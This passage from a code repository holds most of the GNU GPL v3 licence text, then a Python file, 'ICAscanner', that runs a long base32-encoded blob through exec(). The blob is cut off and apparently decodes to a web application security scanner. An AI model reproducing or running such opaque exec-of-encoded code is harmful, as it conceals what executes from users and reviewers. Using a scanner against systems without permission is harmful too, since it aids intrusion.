constantly by software patents. 62 | States should not allow patents to restrict development and use of 63 | software on general-purpose computers, but in those that do, we wish to 64 | avoid the special danger that patents applied to a free program could 65 | make it effectively proprietary. To prevent this, the GPL assures that 66 | patents cannot be used to render the program non-free. 67 | 68 | The precise terms and conditions for copying, distribution and 69 | modification follow. 70 | 71 | TERMS AND CONDITIONS 72 | 73 | 0. Definitions. 74 | 75 | "This License" refers to version 3 of the GNU General Public License. 76 | 77 | "Copyright" also means copyright-like laws that apply to other kinds of 78 | works, such as semiconductor masks. 79 | 80 | "The Program" refers to any copyrightable work licensed under this 81 | License. Each licensee is addressed as "you". "Licensees" and 82 | "recipients" may be individuals or organizations. 83 | 84 | To "modify" a work means to copy from or adapt all or part of the work 85 | in a fashion requiring copyright permission, other than the making of an 86 | exact copy. The resulting work is called a "modified version" of the 87 | earlier work or a work "based on" the earlier work. 88 | 89 | A "covered work" means either the unmodified Program or a work based 90 | on the Program. 91 | 92 | To "propagate" a work means to do anything with it that, without 93 | permission, would make you directly or secondarily liable for 94 | infringement under applicable copyright law, except executing it on a 95 | computer or modifying a private copy. Propagation includes copying, 96 | distribution (with or without modification), making available to the 97 | public, and in some countries other activities as well. 98 | 99 | To "convey" a work means any kind of propagation that enables other 100 | parties to make or receive copies. Mere interaction with a user through 101 | a computer network, with no transfer of a copy, is not conveying. 102 | 103 | An interactive user interface displays "Appropriate Legal Notices" 104 | to the extent that it includes a convenient and prominently visible 105 | feature that (1) displays an appropriate copyright notice, and (2) 106 | tells the user that there is no warranty for the work (except to the 107 | extent that warranties are provided), that licensees may convey the 108 | work under this License, and how to view a copy of this License. If 109 | the interface presents a list of user commands or options, such as a 110 | menu, a prominent item in the list meets this criterion. 111 | 112 | 1. Source Code. 113 | 114 | The "source code" for a work means the preferred form of the work 115 | for making modifications to it. "Object code" means any non-source 116 | form of a work. 117 | 118 | A "Standard Interface" means an interface that either is an official 119 | standard defined by a recognized standards body, or, in the case of 120 | interfaces specified for a particular programming language, one that 121 | is widely used among developers working in that language. 122 | 123 | The "System Libraries" of an executable work include anything, other 124 | than the work as a whole, that (a) is included in the normal form of 125 | packaging a Major Component, but which is not part of that Major 126 | Component, and (b) serves only to enable use of the work with that 127 | Major Component, or to implement a Standard Interface for which an 128 | implementation is available to the public in source code form. A 129 | "Major Component", in this context, means a major essential component 130 | (kernel, window system, and so on) of the specific operating system 131 | (if any) on which the executable work runs, or a compiler used to 132 | produce the work, or an object code interpreter used to run it. 133 | 134 | The "Corresponding Source" for a work in object code form means all 135 | the source code needed to generate, install, and (for an executable 136 | work) run the object code and to modify the work, including scripts to 137 | control those activities. However, it does not include the work's 138 | System Libraries, or general-purpose tools or generally available free 139 | programs which are used unmodified in performing those activities but 140 | which are not part of the work. For example, Corresponding Source 141 | includes interface definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /ICAscanner: -------------------------------------------------------------------------------- 1 | import marshal, base64 2 | exec(base64.b32decode("EMQS65LTOIXWE2LOF5SW45RAOB4XI2DPNYZQUIZAFUVC2IDDN5SGS3THHIQHK5DGFU4CALJKFUFCGICTMNQW4VBTOIQFOZLCEBQXA4DMNFRWC5DJN5XCAU3FMN2XE2LUPEQFGY3BNZXGK4RAFUQEE6JAHIQEW2DBNRSWIICOMFZXGYLSEBAGW3TBONZWC4RXGAZAUIZAEBKGQ2LTEBYHE33HOJQW2IDJOMQGM4TFMUQHG33GOR3WC4TFHMQHS33VEBRWC3RAOJSWI2LTORZGSYTVORSSA2LUEBQW4ZBPN5ZCA3LPMRUWM6IKEMQCA2LUEB2W4ZDFOIQHI2DFEB2GK4TNOMQG6ZRAORUGKICHJZKSAR3FNZSXEYLMEBIHKYTMNFRSATDJMNSW443FEBQXGIDQOVRGY2LTNBSWIIDCPEFCGIBAORUGKICGOJSWKICTN5THI53BOJSSARTPOVXGIYLUNFXW4OZAMVUXI2DFOIQHMZLSONUW63RAGIQG6ZRAORUGKICMNFRWK3TTMUWCA33SBIRSAIBIMF2CA6LPOVZCA33QORUW63RJEBQW46JANRQXIZLSEB3GK4TTNFXW4LQKEMFCGIBAKRUGS4ZAOBZG6Z3SMFWSA2LTEBSGS43UOJUWE5LUMVSCA2LOEB2GQZJANBXXAZJAORUGC5BANF2CA53JNRWCAYTFEB2XGZLGOVWCYCRDEAQGE5LUEBLUSVCIJ5KVIICBJZMSAV2BKJJECTSULE5SA53JORUG65LUEBSXMZLOEB2GQZJANFWXA3DJMVSCA53BOJZGC3TUPEQG6ZQKEMQCATKFKJBUQQKOKRAUESKMJFKFSIDPOIQEMSKUJZCVGUZAIZHVEICBEBIECUSUJFBVKTCBKIQFAVKSKBHVGRJOEAQFGZLFEB2GQZIKEMQCAR2OKUQEOZLOMVZGC3BAKB2WE3DJMMQEY2LDMVXHGZJAMZXXEIDNN5ZGKIDEMV2GC2LMOMXAUIYKEMQCAWLPOUQHG2DPOVWGIIDIMF3GKIDSMVRWK2LWMVSCAYJAMNXXA6JAN5TCA5DIMUQEOTSVEBDWK3TFOJQWYICQOVRGY2LDEBGGSY3FNZZWKCRDEAQGC3DPNZTSA53JORUCA5DINFZSA4DSN5TXEYLNHMQGSZRANZXXILBAO5ZGS5DFEB2G6IDUNBSSARTSMVSSAU3PMZ2HOYLSMUFCGIBAIZXXK3TEMF2GS33OFQQES3TDFYWCANJREBDHEYLONNWGS3RAKN2HEZLFOQWCARTJMZ2GQICGNRXW64RMEBBG643UN5XCYCRDEAQE2QJAGAZDCMJQFUYTGMBRFQQFKU2BFYFF6X3BOV2GQ33SL5PSAPJAE5FWQYLMMVSCATTBONZWC4RHBJPV65TFOJZWS33OL5PSAPJAE4YC4MZDMJSXIYJHBJPV6Z3JORUHKYS7L4QD2IBHNB2HI4DTHIXS6Z3JORUHKYROMNXW2L3LNZQXG43BOI3TAMRPONRWC3TUGNZCOCS7L5SW2YLJNRPV6IB5EATWW3TBONZWC4RXGAZEAZ3NMFUWYLTDN5WSOCS7L5RGY33HL5PSAPJAE5UHI5DQOM5C6L3LNZQXG43BOI3W6MROMJWG6Z3TOBXXILTDN5WSOCQKNFWXA33SOQQHI2LNMUWHG6LTFRXXGLDSMUWHI2DSMVQWI2LOM4FGM4TPNUQGG33SMUXHGY3BNZXGK4RANFWXA33SOQQCUCTGOJXW2IDDN5ZGKLTDN5WG64TTEBUW24DPOJ2CAKQKMZZG63JAMNXXEZJOOJSXC5LFON2GK4RANFWXA33SOQQCUCTGOJXW2IDDN5ZGKLTMN5TWOZLSEBUW24DPOJ2CA3DPM5TWK4QKMZZG63JANVXWI5LMMVZS443DMFXHIM3SL5WWC23FOIQGS3LQN5ZHIICNN5SHK3DFBJTHE33NEBXXA5DQMFZHGZJANFWXA33SOQQE64DUNFXW4UDBOJZWK4QKMZZG63JAOF2WK5LFEBUW24DPOJ2CAULVMV2WKCTEMVTCA4DPON2F6ZDBORQSQ4DBOJQW24ZJHIFCAIBAEBUWMIDQMFZGC3LTHIFCAIBAEAQCAIBAOBZGKUDPON2EIYLUMEQD2IDQMFZGC3LTFZZXA3DJOQUCEJRCFEFCAIBAEAQCAIBAOBXXG5CEMF2GCIB5EB5X2CRAEAQCAIBAEAQGM33SEBSCA2LOEBYHEZKQN5ZXIRDBORQTUCRAEAQCAIBAEAQCAIBAEBYCAPJAMQXHG4DMNF2CQIR5EIWCAMJJBIQCAIBAEAQCAIBAEAQCA4DPON2EIYLUMFNXAWZQLVOSAPJAOBNTCXIKEAQCAIBAEAQCA4TFOR2XE3RAOBXXG5CEMF2GCCRAEAQCA4TFOR2XE3RAPN6QUZDFMYQGOZLUMFZGO4ZIFE5AUCLHNRXWEYLMEB2GQZK7N5YHI2LPNZZSY5LSNQWGM4TPNVZSYZDBORQSY4TGNFWGKLDSFRRW633LNFSSY5DIOIWHI2LNMVXSYZDBORSSYZLOMNXWIZLEFRZGKZDJOIWHMZLSOQWGGYLHMVXHILDQOJXXQ6JMONWGKZLQFR4WK2BMNZXXAYLSFRWW6ZDVNRSWKLDNN5SHK3DFFRSCYYTBORRWQCQJNVXWI5LMMVSSAPJAIZQWY43FBIEXEZTJNRSSAPJAJZXW4ZIKBF4WK2BAHUQEMYLMONSQUCLVOJWCAPJAJZXW4ZIKBFYHE33YPEQD2ICON5XGKCQJMNXW623JMUQD2ICON5XGKCQJNZXXAYLSEA6SARTBNRZWKCQJOI6UMYLMONSQUCLIMVWHAZLSHUUCEIRCBJHXA5DJN5XHGOQKEAQC22BMEAWS22DFNRYCAIBAEAQCAIBAEAQHYIBAEAQFG2DPO4QGQZLMOAQG2ZLTONQWOZJAMFXGIIDFPBUXICRAEAWS25TFOJZWS33OEAQCAIBAEAQCAIBAEB6CAIBAEBJWQ33XEBYHE33HOJQW2J3TEB3GK4TTNFXW4IDOOVWWEZLSEBQW4ZBAMV4GS5AKEAQC25JAKVJEYLBAFUWXK4TMHVKVETBAEAQHYIBAEAQFIYLSM5SXIICVKJGCAKDFFZTS4ITIOR2HAORPF53XO5ZOORQXEZ3FOQXGG33NF53HK3DOFZYGQ4B7NFSD2MJCFEFCAIBNFVSGC5DBHVCECVCBEAQCAIBAEAQCAID4EAQCAICEMF2GCIDTORZGS3THEB2G6IDCMUQHGZLOOQQHI2DSN52WO2BAKBHVGVBAFBSS4ZZOEARGSZB5GERCSCRAEAWS23DJON2D2RSJJRCSAIBAEAQCAIBAEB6CAIBAEBDWK5BAIFWGYICVOJWHGIDGOJXW2ICMNFZXICRAEAWS25DIOJSWCZDTEAQCAIBAEAQCAIBAEB6CAIBAEBGWC6BANZ2W2YTFOIQG6ZRAMNXW4Y3VOJZGK3TUEBEFIVCQFBZSSIDSMVYXKZLTORZSAKDEMVTGC5LMOQQDCMBJBI